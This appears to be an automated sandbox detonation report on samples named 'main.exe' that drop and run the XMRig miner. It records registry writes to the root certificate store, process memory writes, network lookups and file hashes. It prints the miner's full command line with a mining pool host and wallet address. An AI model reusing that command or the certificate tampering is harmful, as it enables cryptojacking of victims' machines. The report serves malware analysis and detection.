memory/4552-59-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-60-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-61-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-62-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-63-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-64-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-65-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-66-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-67-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-68-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-69-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-70-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-71-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-72-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-73-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-74-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-75-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-76-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-77-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-78-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-79-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-80-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-81-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

memory/4552-82-0x00007FF6B18D0000-0x00007FF6B23D3000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:58

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3152 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
PID 3152 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\main.exe C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

Processes

C:\Users\Admin\AppData\Local\Temp\main.exe

"C:\Users\Admin\AppData\Local\Temp\main.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 155.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 57.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4524-14-0x000001A6DE8F0000-0x000001A6DE910000-memory.dmp

memory/4524-15-0x000001A6DE930000-0x000001A6DE950000-memory.dmp

memory/4524-16-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-18-0x000001A6E0230000-0x000001A6E0250000-memory.dmp

memory/4524-17-0x000001A6E0210000-0x000001A6E0230000-memory.dmp

memory/4524-19-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-20-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-23-0x000001A6E0230000-0x000001A6E0250000-memory.dmp

memory/4524-22-0x000001A6E0210000-0x000001A6E0230000-memory.dmp

memory/4524-21-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-24-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-25-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-26-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-27-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-28-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-29-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-30-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-31-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-32-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-33-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-34-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-35-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-36-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-37-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-38-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-39-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-40-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-41-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-42-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-43-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-44-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-45-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-46-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-47-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-48-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-49-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-50-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-51-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-52-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-53-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-54-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-55-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-56-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-57-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-58-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-59-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-60-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-61-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-62-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-63-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-64-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-65-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-66-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-67-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-68-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-69-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-70-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-71-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-72-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-73-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-74-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-75-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-76-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-77-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-78-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-79-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-80-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-81-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

memory/4524-82-0x00007FF60F1A0000-0x00007FF60FCA3000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:33

Platform

win10v2004-20240611-en

Max time kernel

1796s

Max time network

1791s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

